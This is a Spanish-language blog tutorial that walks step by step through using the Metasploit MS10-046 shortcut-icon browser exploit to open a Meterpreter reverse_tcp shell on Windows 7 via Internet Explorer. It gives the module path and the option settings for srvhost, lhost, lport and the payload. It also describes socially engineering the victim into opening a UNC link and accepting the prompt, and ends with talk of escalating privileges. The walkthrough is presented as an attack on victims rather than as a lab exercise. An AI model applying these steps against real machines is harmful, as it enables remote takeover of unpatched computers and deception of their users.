Hola amigos y amigas, hoy no traigo una novedad pero dada la cantidad de equipos que todavía corren windows 7 como sistema operativo, veo interesante el uso de este exploit que nos permite obtener una shell del tipo reverse_tcp mediante del uso del navegador internet explorer.

Como todos los exploits hoy en día vamos a necesitar la ayuda de la victima para poder llevar el ataque con éxito. Para ello debemos usar un poco de ingeniería social que voy a explicar también para detallar paso a paso el uso del exploit de manera completa, bueno, vamos allá!! .

El primer paso es abrir el Framework de Metasploit y llamar al exploit: windows/browser/ms10_046_shortcut_icon_dllloader, este exploit será invocado con el comando use por delante de la ruta del exploit.

use

Ya tenemos invocado el exploit así que debemos configurar las opciones siguientes:

  • set srvhost ( ip de la máquina Kali Linux ).
  • set lhost  ( ip de la máquina Kali Linux ).
  • set lport ( Puerto a la escucha entre internet y la máquina Kali Linux ).
  • set Payload ( windows/meterpreter/reverse_tcp ).

Debe quedar así:

2

Con esto configurado ya podemos lanzar el exploit con el comando run o exploit. ( Veremos algo así ).

3

NOS VAMOS A LA MÁQUINA WINDOWS 7

Os Voy a recordar que este exploit solo funciona con el navegador internet explorer , yo estoy usando explorer 8 pero funciona en versiones de hasta 10 que yo sepa, por eso es importante actualizar las aplicaciones ya que se corrigen estas vulneravilidades.

Abriremos el naveador internet explorer e insertaremos la url que nos ha facilitado metasploit en su linea Send Vulnerable Clients ( en este caso es \\192.168.1.138\GRMfrEG\ ).

4

Al entrar la url en el navegador se nos lanzará un mensaje del tipo allow / deny que debemos aceptar para iniciar el shell de meterpreter.

5

DEL LADO DE LA MÁQUINA KALI LINUX

Una vez la víctima acepta el mensaje del navegador en internet explorer se obtiene la sesión de meterpreter, antes de eso veremos en meterpreter que se está ejecutando el script que lanza el mensaje hacia el navegador de la máquina Windows 7.

 

6

Ahora ya podríamos usar el bypass para obtener privilegios, lastima que este exploit no funcione en windows superiores a 7 y solo sea aprovechable su carga util desde internet explorer menor a 11, pero todo en la vida no puede ser del color de rosa, ¿¿VERDAD??.

 

 

 

 

 

Anuncios